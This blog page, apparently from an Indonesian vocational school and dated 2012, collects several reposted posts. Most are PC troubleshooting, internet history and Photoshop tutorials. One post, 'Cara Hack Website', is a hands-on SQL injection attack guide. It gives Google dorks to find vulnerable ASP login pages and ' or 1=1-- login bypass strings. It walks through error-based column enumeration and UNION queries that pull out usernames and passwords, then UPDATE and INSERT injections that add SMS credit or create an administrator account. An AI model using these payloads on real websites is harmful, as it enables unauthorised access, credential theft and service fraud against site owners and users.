Ruang Belajar SMK Saradan

Ruang belajar yang nyaman dan asri.

Ekstra Kul Sepak Bola

Prestasi Sepak Bola di Kabupaten Bogor

Ekskul Tae Kwoo Doo

Kegiatan Olah Raga Ekskul di Lingkungan Sekolah

Ekskul Paskibra

Kegiatan Paskibra untuk Upacara hari besar Nasional

Kegiatan Bakti Sosial

Kegiatan Bakti Sosial di Lingkungan Sekolah.

Sabtu, 08 Desember 2012

Cara Hack Website


Cara Hack Website

Hallo Semua? Apakabar? Sorry Sudah Lama Offline? ini ada sedikit cerpen tentang cara hack sebuah Website ,tapi jangan di gunakan untuk kejahatan ya

::PREFACE::
============ =
Setelah banyaknya bug-bug yang bertebaran di jagad maya ini dari
yang namanya Unicode (masih ada lho sekarang) , RPC DCOM, XSS, VP-
ASP, dan bug-bug e-commerce lainnya kini yang lagi "trend" dalam
teknik hacking adlaah SQL Injection. dalam vol. 1 ini gw jelasin
cara ngisi sesuatu dengan perintah UPDATE

::DESCRIPTION: :
============ ===
SQL adalah bahasa pemrograman database yang banyak dipakai dalam
website, laporan keuangan, data-data pekerjaan, data mahasiswa, dan
lain lain. Diantara jenis lainnya MS-SQL adalah yang paling
terkenal, nah ternyata semua hal yang di jagad maya ini adalah
Vulnerable terhadap berbagai serangan, jadi SQL pun menjadi target
dalam hal ini.

::VULN::
========
yang akan gw bahas disini adalah MS-SQL yang Link ODBC dengan bahasa
pemrograman website ASP.

::Injection: :
==========
ok, setelah basa basi diatas gw mulai neh ..hehehe
untuk menginject sql ini anda perlu memperhatikan input-inputan
dalam situs itu yang sekiranya connect dengan SQL database situs
itu, atau bisa juga dengan menambah dari link url di kotak browser
anda semisal : ....asp/productID= 1'[sql query/string. untuk mencari
target yang vuln seperti kondisi diatas anda perlu mencarinya
yang .asp nah seperti biasa....GOOGLING! !! hehehe
key wordnya di google adalah :

1. allinurl:.co. id/login. asp
2. allinurl:.com/ admin.asp

semuannya itu banyak kombinasinya lainnya itu tergantung seberapa
jauh anda kreatif dalam mencari target di google.nah, kanre disini
gw bahas cara inject ke situs web to sms so searchnya : asp,web to
sms atw Send SMS, ASP

ok, misal kita dapet target www.apes.com, nah lihat dah ada inputan
yang masuk ke database itu ga, misalnya search product, member
login, atw admin login :) setelah itu kita isa inject pake
sql "umum" stringnya : ' or 1=1-- disini kita lihat kalau 1=1 itu
nialinya true dan tanda -- itu adalah marknya SQL kalau di C++/C
itu // _/* jadi setelah tanda Mark perintah selanjutnya tidak
dijalankan. nah klo beruntung dapet /admin.asp kita inject seperti
diatas itu bisa lho kita masuk sebagai admin! ini terjadi di situs
berita nasional di indonesia...

nah, klo ga dapet dir adminya yah kita cari kotak input yang kiranya
connect ke database situs itu, contoh isa di login, member, search,
dll. kita masukan debugging codenya : ' having 1=1--
jreeeeeng... ..ini musti diinget n kudu di pake setiap klo mo inject,
kita injet di :

userid : ' having 1=1--
Password :fuzk3

lalu....jreeeeeeng. ...ERROR! !!!
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userid' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25

tuh ketahuan ada kolom UserDB.userid, klo udah gini gemana lagi
dungs? ok kita loop lagi sekarang kita inject : ' group by
UserDB.userid -- atau ' group by UserDB.userid having 1=1-- disini
kita gunain perintah group by untuk menggroup kolom ingin kita
lihat....ehehe. ..muncul error lagi, kali ini beda choi...
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userpass' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25

nah sekarang kita tau apa aja kolomnya...hehehe
penerapan selanjutanya adalah misal situs itu adalah situs
pengiriman SMS sedunia yang kalo kita membernya kita bisa send sms
dari web, namun harus ada account yang digunakan untuk mengirim sms
itu, jadi account itu harus ada nilainya dan untuk itu kita harus
mengisinya dengan cara membelinya.. .ok ok NO CARDING HERE!!!
heheheh...so gemana neh??? karena kita ini orang-orang kere hehehe
so kita inject aja....sebelumnya kita harus jadi member kan gratis
ini daftarnya...
setelah kita jadi member dengan id : fuzk3 dan pass: Vero...kita log
ke situs itu dengan id kita, cari tahu string khusus yang digunakan
web itu untuk menghitung account sms kita, misalnya : cell
nah, inilah injectnya... .cari login inputan lagi misal /member.asp
nah disitu ada input box id dan pass...kita Inject dengan :
' UPDATE [namadatabase] SET [charkhusus] = [nilai] WHERE [namakolom]
= '[char_id]'- -
contoh :
' UPDATE UserDb set cell=100 where userid ='fuzk3'-- (inget neh)
sep, nah klo muncul error : userid not found kita isa cari input di
forgot password : dengan inputan sama...jreeen ketika di jalankan ga
ada error apa-apa..kembali login lalu...jreeeeeenng. ..liha cell mu
itu waduh 100 cell enak neh sms seratus kali....kiekiekie. ..SUKSES
BRO!!! :)

atau cara ke 2

::PREFACE::.
============
Kalau di Vol.1 dah dibahas teknik UPDATE di MS-SQL maka disini gw
jelasin cara INSERT dan UNION......rada ngejelimet neh.....makanya
kalau
baca artikel ini harus ada aer putih hyuehueh.... N disini gw juga
akan
kasih kilas balik sedikit untuk yang baru nyoba2 :) n penjelasan
yang
lebih detail

.::BODY::.
============

Sebelumnya tolong apabila browser kalian pada pake IE setting dulu
browsernya agar bisa melihat errornya. Setting di Tools-Internet
option-Advanced tab-Show friendly HTTP error messages. itu musti
dilakukan, kalau
tidak kalian tidak bisa lihat error messages yg keluar nanti.
OK, masih inget kan cara cari targetnya? kalau lupa lihat lagi
artikel
Vol.1 :)

Nah, klo dah dapet targetnya sekarang tinggal input SQL Querynya di
input boxnya :

www.target.com/ login.asp >> contoh target
www.target.com/ login.asp? err=Invalid_ password >> persan error yang
dapat di eksploitasi seperti biasa kalau ingin cari n tes vuln
engganya tuh
situs kita ketikan ' having 1=1-- di input box atau URL error tadi ,
contoh : www.target.com/ login.asp? err=' having 1=1-- then,....

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserID' is invalid in the select list because it is
not
contained in an
aggregate function and there is no GROUP BY clause

itu error messagesnya, kini kita group field UserID dari table
Users,
stringnya : ' group by UserID --
then,...

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.ClientName' is invalid in the select list
because it is not contained in either an aggregate function or the
GROUP BY clause.

muncul lagi error seperti itu....lalu lagi kita Group. Kini
stringnya
adalah ' group by
field1,field2 --
contoh : ' group by UserID,ClientName --
then,...

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserName' is invalid in the select list because it is
not
contained in

either an aggregate function or the GROUP BY clause.
trus group by lagi, hal ini kita lakukan (proses looping) sampai
semua
field kita

ketahui..... .makanya harus sabar, kalau engga ga bakal tembus :)
apabila sudah lama melakukan looping dan akhirnya ketika group
terakhir
kita lakukan dan tidak keluar error messagesnya maka error yang
terakhir adalah field yg terakhir.... .field table itu bisa panjang
sekali,
tergantung admin yang masangnya jadi susah kalau maen teabk2an
ajah....contoh field yang pernah gw temuin : ' group by
UserID,ClientName, UserName, Password, PhysicalAddress, PhoneNumber, Email
,
OperatingSystem, PrefferredGraphi cFormat
-- >> ada 9 field!!! jangan males dalam proses Looping :P

setelah dapet semua field, kini yang kita lakukan adalah mencari
siapa
aja user yang ada dalam table Users dan kolom UserName...
caranya? kita pake Union apa itu UNION??? union adalah perintah SQL
dimana ia dapat menggabungkan dua SELECT list tapi kalau pengen
gunain
Union ini kita harus tahu ada berapa field dalam table tadi

sintaksnya gini :
select field1, field2, … field_n
from tables
UNION
select field1, field2, … field_n
from tables;

nah biasanya dalam SQL QUERY di input box username itu mereka bikin
query select * from

Users where UserName =='"+login+" ' and Password='"+ pass"'"; nah
kalau
begitu kita masukin syntax sql union untuk melihat username : '
union
select min(UserName) ,1,1,1 from Users where username > 'a'--
jadi hasilnya : select * from Users where UserName ==' union select
min(UserName) ,1,1,1 from Users where username > 'a'--and
Password='"+ pass"'"; gitu kiranya, jadi nanti akan muncul error
messages lagi
yang akan menampilkan sebuah username lebih dari huruf a ,contoh:

Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Agile' to a column of
data
type int. /

tuh lihat kan ada user dengan nama Agile...lalu looping lagi pake
string union tadi nanti akan muncul username2 lain....lalu bagaimana
dengan
passwordnya? ??
ok union beraksi kembali : ' union select min
(UserName),1, 1,1,1,1,1, 1,1
from Users where username > 'Agile'--
lalu akan muncul error yang memberitahukan passwordnya, contoh :

Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Surfer' to a column of
data
type int. /

kalau dah gini kita bisa masuk dengan Username Agile dan passwordnya
Surfer...hehehe

selamat yah!
btw, kita juga ingin dong bisa INSERT databasenya. ....
caranya : karena ktia sudah tahu field2nya maka stringnya jadi : '
insert into table values
(field1,field2, ....,field_ n)--
misalkan ada field sebagai berikut :
'Users.UserID'
'Users. Username'
'Users.Password'
'Users.FName'
'Users.LName'
'Users.EmailAddress '
'Users.Administrato r'
itu berarti ada 7 field! Ok kita masukan menurut string tadi : '
insert
into Users values

(0,'lucifer' ,'lucifer' ,'lu','cid' ,'a@a.com',1)-- >> artinya kita
masukan id kita dalam

urutan 0, lalu username 'lucifer', password 'lucifer' Fname
(frontName)
itu 'lu',
Lname(LastName) sebagai 'cid', dan EmailAddress 'a@a.com'......
coba kita login dengan user buatan kita tadi....BINGO! selamat anda
berhasil menjebol

database situs target.....

Memperbaiki komputer yang sering restart terus


Memperbaiki komputer yang sering restart terus


Selamat malam sobat. post kali ini adalah memperbaiki komputer yang restart terus.
ada 3 kemungkinan yang membuat komputer melakukan restart terus-menerus. bisa juga lebih dari itu.

1. karena virus
2. beberapa file system windows, yang ada pada drive : c hilang.
3. Prosesors terhalang oleh debu.

berikut cara menangani masalah seperti itu.


1. Karena Virus

Akibat virus, komputer diperintahkan untuk melakukan restart saat masuk windows. hal ini pasti akan sangat susah memperbaikinya. dengan cara saya, kamu pasti bisa memperbaikinya.
 pretama-tama, coba kamu scan dengan antivirus dahulu.
 caranya gimana? kan tidak bisa masuk windows?
mudah saja, sebelum ada tanda start windows muncul. tekan F8 berulang-ulang hingga mendapatkan tulisan putih, bertulisakn start windows normally,  safe mode, dan lain-lain.
jika tidak muncul maka reset komputer kamu dan ulangi lagi.
Catatan : tidak semua komputer sama dengan menekan tombol F8 , hal ini tidak akan dibahas dalam post ini.
lalu cobalah masuk ke dalam safe mode. biasanya kalau virusnya belum parah, kamu akan bisa masuk ke dalam system safe mode windows. bersihkanlah dari situ. penjelesan kurang lengkap? silahkan komentar dibawah buat voting. jika vote cukup. maka saya akan bikin postnya yang lebih lengkap lagi.

lanjut ke tahap berikutnya.

2. Beberapa file system windows hilang.

seperti yang kita ketahui, komputer restart bisa terjadi karena file system windows hilang. penyebabnya bisa dikarenakan virus, harddisk mulai rusak. dan komputer dimatikan secara tidak benar. ( contoh mati lampu).
 hal seperti ini bisa kita perbaiki melalui proses install ulang, atau gunakan kaset windows yang sesuai dengan OS kita untuk repair. namun ini hanya berlaku untuk komputer normal dalam arti tidak ada kerusakan hardware. dan tidak berlaku untuk kerusakan hardware seperti harddisk.



3. Prosesor terhalang oleh debu.

wah, ini yang paling banyak saya temui. dan saya rekomendasikan untuk cek ini pertama kali jika komputer kita restart sebelum logo wins nya.
kebanyakan orang jika sudah menggunakan komputernya, maka akan sangat jarang sekali membuka chasing komputernya untuk cek debu didalam. jujur saja, memang kita merasa aman dengan chasing tertutup, namun tidak menutup kemungkinan bahwa debu bisa masuk dari arah manapun. sehingga menutupi kipas yang mengarah ke prosesor sehingga menyebabkan prosesor kepanasan.
lalu apa yang terjadi jika prosesor terlalu panas?
jika terlalu panas akan menyebabkan system pada komputer men-shut down otomatis komputerkamu. dan jika tidak ada pengaman shutdownprosesor kamu bisa rusak.
 untuk itu, lakukanlah pembersihan termasuk pembersihan kipas prosesor di komputer kita. minimal sebulan sekali atau jika mengalami restart seperti ini. karena jika dipaksakan. bisa membuat prosesor kamu jadi telur goreng bin hangus. hahaha



oke. itulah penyebab komputer sering restart terus saat main game ataupun saat baru dinyalakan.
jika kamu suka dengan artikel ini. ada 2 cara buat mendukung saya.



Update : 1 hal yang saya lupakan padahal sering juga saya lakukan dan terima kasih kepada sobat Arpp Vesppenheiken yang ada di fb. salah satu solusi terakhir adalah cobalah mengganti power supply komputer kamu.

1. mohon klik iklan saya yang tampil. tenang saja. 1 hari hanya 1 ip yang boleh klik. dan kalau sudah di klik si iklan ini tidak akan muncul lagi.
2. donasi. hehehe, yang ini rasanya paling vote tidak buat kamu semua. silahkan saja jika mau, email saya ya, atau ym saya.

Sejarah dan Perkembangan Internet


Sejarah dan Perkembangan Internet
· in Internet & Komunikasi




Tahukah Anda apa itu Internet? Apa itu Jaringan Internet? Bagaimana Internet bekerja? Mungkin beberapa orang pernah berpikir dan pertanyaan-pertanyaan di atas terlintas pada saat Anda di depan komputer dengan terkoneksi internet. Saya pun juga demikian adanya.

Video Sejarah Internet


Sejarah Internet

Internet singkatan dari Interconnection-networking. Penjelasan secara umum yaitu suatu sistem global dari semua jaringan komputer yang saling terhubung satu sama lain menggunakanstandard Internet Protocol Suite (Transmission Control Protocol/Internet Protocol) untuk bisa melayani milyaran lebih user di seluruh jagat raya. Departemen Pertahanan Amerika pada tahun 1969 berhasil membangun sebuah jaringan komputer yang disebut Internet dengan sebuahproyek ARPA yang disebut Advanced Research Project Agency Network atau disingkat ARPANET. Dengan sebuah saluran telepon dan media hardware serta software yang ber-platform UNIX, kita dapat melakukan komunikasi dalam radius jarak yang tak terbatas.

Proyek internet pada mulanya hanya untuk keperluan Departemen Pertahanan Amerika. Pada saat itu militer membuat sistem jaringan komputer yang terpencar dengan cara menyambungkan beberapa komputer di wilayah-wilayah peting untuk mencegah terjadinya masalah ketika terjadi serangan dan untuk menghindari terjadinya informasi terpusat. Pada awalnya ARPANET hanya menyambungkan empat situs, yaitu Stanford Research Institute, University of California, Santa Barbara, dan University of Utah, di mana mereka membentuk suatu jaringan terpadu pada tahun 1969. Dan pada Oktober 1972, ARPANET secara umum diperkenalkan. Beberapa lama kemudian, ternyata proyek ini mendapat dukungan dan berkembang pesat di seluruh wilayah negara tersebut. Karena banyaknya universitas yang ingin bergabung di negara Amerika, maka ARPANET dibagi menjadi 2, yaitu MILNET dan ARPANET kecil. MILNET khusus untuk pengguna militer, dan ARPANET digunakan untuk pengguna non militer, seperti sekolah-sekolah universitas yang akan bergabung. Gabungan MILNET dan ARPANET ini akhirnya dikenal dengan sebutan DARPA Internet, yang kemudian disebut Internet agar lebih mudah diingat.
Perkembangan Internet

Dalam perkembangannya yang hanya terbatas di negara Amerika Serikat, sekarang Internet bisa digunakan di seluruh dunia. Di dalam penggunaan Internet, terdapat beberapa protokol-protokol Internet yang digunakan, antara lain, TCF, DNS, IP, SSL, FTP, Telnet, HTTPS, SSH, HTTP, POP3, UDP, IMAP, dan SMTP. Beberapa layanan-layanan populer Internet yang menggunakan protokol-protokol tersebut adalah surel(surat elektronik) atau biasa di sebut email, Newsgroup, Usenet, File Sharing, IRC, WWW, dan sebagainya. Beberapa yang disebutkan diatas, yang paling sering digunakan yaitu email dan WWW. Selain yang disebut diatas, Internet dapat digunakan untuk berhubungan antara dua pengguna atau lebih melalui aplikasi pengiriman pesan secara instan seperti YM, MSN, Camfrog, Facebook, Twitter, dan Pidgin atau beberapa aplikasi sejenis yang sekarang ini berkembang pesat.

Internet secara tidak langsung memiliki pengaruh besar dalam perkembangan ilmu pengetahuandan pandangan dunia. Sekarang ini dengan hanya menggunakan Internet dan mengakses Google, pengguna dapat memperoleh berbagai macam informasi yang sangat lengkap bila dibanding mencari informasi di buku perpustakaan.

Bagaimana menurut Anda tentang Internet setelah tahu sejarah dan perkembangan Internet?

Minggu, 02 Desember 2012

Membuat Efek Keren Lagi dalam 1 menit

Photography Effect : Membuat Efek Keren Lagi dalam 1 menit

Membuat efek-efek buat foto sebenernya gak susah.. saya nemu membuat efek dari foto yang keliatan nya biasa menjadi foto yang lumayan keren.. hanya dengan 1 menit sajah.. beneran !
Oia… Sekali lagi… saya pake adobe photoshop CS 3 yah… jadi jangan ada yang nanya lagi yah..  saya pake photoshop versi berapa :)
Langsung aja tanpa basa basi …
Buka foto yang mau diedit..

Duplikat layer background dengan menekan ctrl+J

Klik Filter > Other > High Pass

Ganti layer effect menjadi Vivid Light..

Gambar sekarang keliatan sedikit lebih tajam dan mendetail..
Klik Add New Fill or Adjusment Layer > Gradient Map

Otomatis akan terbentuk layer baru di atas layer hasil duplikat tadi.
Gradient Map yang dipake dari hitam ke putih

Duplikat lagi layer background dengan menekan CTRL + J lalu pindahkan layer hasil duplikat ke paling atas

Klik Image > adjustment layer > Shadow/Highlight

Terakhir Layer Effect ganti menjadi Overlay dan opacity jadi 80%..
hasilnya :

Kita lihat perbedaan sebelum dan sesudah  :

Selamat mencoba !
Artikel Photography Effect : Membuat Efek Keren Lagi dalam 1 menit ini dipersembahkan oleh Tutorial Photoshop Gratis. Kunjungi Wallpaper, Font, Desktop Theme Gratis Pokoknya Serba Gratis. Baca Juga Adobe Photoshop Tutorials

Cara Menempelkan Baju hasil design ke model

Photoshop Untuk Usaha – Cara Menempelkan Baju hasil design ke model

Saya akan kasih contoh adobe photoshop yang digunakan untuk usaha…  banyak banget  jenis  usaha yang melibatkan photoshop.. menurut saya sih, semua usaha  butuh photoshop hehehehe.. contohnya: pembuatan brosur, Iklan di  jalan-jalan, pembuatan packaging suatu produk, photography (jelas ini mah)  dan lain-lain…
Ada request tentang bagaimana cara menempelkan baju jualan nya ke seorang model dan nanti bisa digunakan sebagai alat marketing supaya produknya lebih menarik. Ini biasanya untuk jualan di facebook nih hehehe.. karena saya udah kasih tutorial cara buatnya.. jangan nge-Wall atau promosi di facebook saya lagi yah… :D  awass lho!
ya udah karena udah pada gak sabar, saya mulai deh.. ( udah jangan nyengir terus.. eeeh.. masih nyengir juga..kalo masih nyengir gak jadi nih buat tutorialnya…. ehh.. bandel yah.. udah.. mingkem ah.. !  :p)
Saya punya foto dapet  dari google .. yang satu modelnya dan yang satu baju nya.. sekarang saya akan kasih tau cara nya supaya baju itu dipake sama si model.. sebenernya tutorial ini persis sama dengan yang tutorial foto cinta laura ..
buka kedua foto yang mau digabung

GUnakan magic wand tool untuk menyeleksi background putih nya…
Karena warna background putih atau sama warna nya.. maka gunakan magic wand tool. karena sekali KLIK aja semua bisa terseleksi.
TIPS : untuk memfoto produk, diwajibkan background berwarna polos yang kontras dengan produknya..

sekarang klik Select > Inverse untuk menyeleksi bagian Dress nya..

Drag gambar dress yang sudah di diseleksi ke dalam gambar modelnya.

Atur Dress nya supaya pas di badan si model.. bisa diputer, di besarin, dikecilin, pokoknya musti pas di badan.

Setelah kira-kira pas dibadan, pasti nanti ada bagian model yang nongol dikit-dikit.. kita liquify aja … udah pernah kan saya kasih tutorial tentang liquify di tutorial menguruskan badan

Pindahkan cursor ke layer background lalu Klik Filter > Liquify ( Photoshop CS 3 )

Hasil setelah liquify :

Tapi tangannya gak muncul.. mustinya posisi jari tangan berada di depan dress nya..  marilah kita Edit..!
Zoom daerah tangan.. tapi sebelumnya matikan dulu layer Dress nya.

Gunakan Pen tool untuk menyeleksi jari-jari tangan nya..

Kalo sudah terseleksi, Klik kanan di jendela gambar > Make selection

Klik Edit > copy, Lalu klik edit > paste .. nanti terbentuk layer baru.. nah.. si layer baru pindahin ke atas layer Dress ..

Nyalakan lagi layer Dress nya..

Kalo ternyata masih ada warna bawaan dari jari yang belum rapi, hapus pake eraser tool

Supaya lebih keliatan Real, beri bayangan di sekitar jari nya..
buat layer baru dibawah layer jari , lalu brush dengan warna hitam … atur-atur aja gimana cara nya supaya keliatan real..

Dan hasil akhirnya adalah :

Gampang kan yah.. ?
Selamat mencoba …
Artikel Photoshop Untuk Usaha – Cara Menempelkan Baju hasil design ke model ini dipersembahkan oleh Tutorial Photoshop Gratis. Kunjungi Wallpaper, Font, Desktop Theme Gratis Pokoknya Serba Gratis. Baca Juga Adobe Photoshop Tutorials

Membuat Foto Vintage (Antik) pada foto Ayu Ting Ting hanya dengan Curves

Membuat Foto Vintage (Antik) pada foto Ayu Ting Ting hanya dengan Curves

Foto Vintages adalah foto yang kelihatan antik atau foto jadul.. dulu saya sudah pernah posting cara membuat foto jadul .. cara pembuatan foto vintage atau antik yang ini beda dan gampang banget..Hanya mengandalkan keajaiban CURVES foto vintage pun jadi.. mau bukti ?
Buka foto Ayu Ting Ting ( Neng Ayu Ting Ting ini siapa nya Malih Tong Tong yah ?? ) hehehe
ayu ting ting
saya ambil dari kapanlagi.com hehehe.. minta foto nya yaa ..
Duplikat layer background dengan menekan CTRL +  J ..

Sekarang Klik Add New Fill and Adjustment layer di Layer Palette.

Di Jendela Curves ada yang nama nya Channel.. dan ini fungsi nya untuk menyeting warna atau cahaya di sebuah foto..
Channel RGB = RED , Green , Blue..
nah kita setting deh si Channel tersebut..
Kita setting Channel Biru nya dulu ..

Sekarang kita setting Channel Green :

Sekarang Channel RED

Catatan : Kalo Kadung ke Klik OK , Klik aja 2x layer Curves di layer pallete nya ..
Pilih Layer Background Copy hasil Duplikat layer background tadi..
Klik Filter > Noise > Add Noise

Sekarang kita gunakan Efek Vignette atau membuat gelap di semua sisi foto.. kita gak perlu pake manual kalo udah pake CS 3 ke atas..
Kita pake Filter Lens Corrections..
Pilih Filter > Distort > Lens Corrections

Kalo sudah di setting Vignette nya  .. Klik OK
Hasilnya  :
ayu ting ting 
Selamat Mencoba !!
Artikel Membuat Foto Vintage (Antik) pada foto Ayu Ting Ting hanya dengan Curves ini dipersembahkan oleh Tutorial Photoshop Gratis. Kunjungi Wallpaper, Font, Desktop Theme Gratis Pokoknya Serba Gratis. Baca Juga Adobe Photoshop Tutorials

Cara Memisahkan Objek dan Background pada gambar dengan Plugin Azlect

Cara Memisahkan Objek dan Background pada gambar dengan Plugin Azlect

Tutorial photoshop ini sama dengan tutorial yang pernah saya buat tentang pemisahan background dengan extract bedanya kali ini menggunakan Plugin .. hehe.. lebih gampang dan cepat!
Download dulu Plugin nya di Member Area..  atau yang belum jadi member silahkan cari di google.. ada kok kalo jeli. :D
Cara install nya ada juga kok.. jadi download, Install trus pake :)
Buka gambar yang mau diedit.. saya pake gambar Steven Gerrard .. Gelandang hebat liverpool itu loh ! hehehe
steven gerrard 
Duplikat layer background dengan menekan CTRL + J

Sekarang buka Plugin Ezlect nya di Filter > Ezlect > Ezlect extract

Ini Jendela Ezlect nya , toolnya cuman dikit kok jadi mudah dipelajari
steven gerrard
Klik Di Object nya ( Steven Gerrard nya)  dengan Penanda Object dan Klik di background oleh penanda background.. penampakannya kayak gini nih
steven gerrard
Penanda Objek ditandai dengan gambar kotak kecil kalo penanda background ditandai dengan tanda x
Klik Show mask Image untuk melihat hasilnya… kalo kurang bagus bisa dicoba .. klik lagi Show selection edge (letaknya disamping show mask image)
( tool lain nya di dalam ezlect silahkan di pelajari sendiri .. gampang banget kok)
Kalo sudah beres klik Ok ..

background di layer 1 sudah hilang…
Ini sebenernya sudah beres pekerjaan plugin Azlect..
Sekarang tinggal menggunakan gambar hasil pemisahan background tersebut.. terserah mau diapain.. hehehe
steven gerrard
Saya beri background aja deh yaa sebagai contoh nya…
buat layer baru di bawah layer 1
terus warnai dengan warna merah

Sekarang klik 2x layer 1 untuk memunculkan Blending Options

Klik Ok…
Beri text atau gambar tambahan … jadinya seperti ini :
steven gerrard
Selamat Mencoba !
Artikel Cara Memisahkan Objek dan Background pada gambar dengan Plugin Azlect ini dipersembahkan oleh Tutorial Photoshop Gratis. Kunjungi Wallpaper, Font, Desktop Theme Gratis Pokoknya Serba Gratis. Baca Juga Adobe Photoshop Tutorials

Andri Yunatra, S.Pd@2012. Diberdayakan oleh Blogger.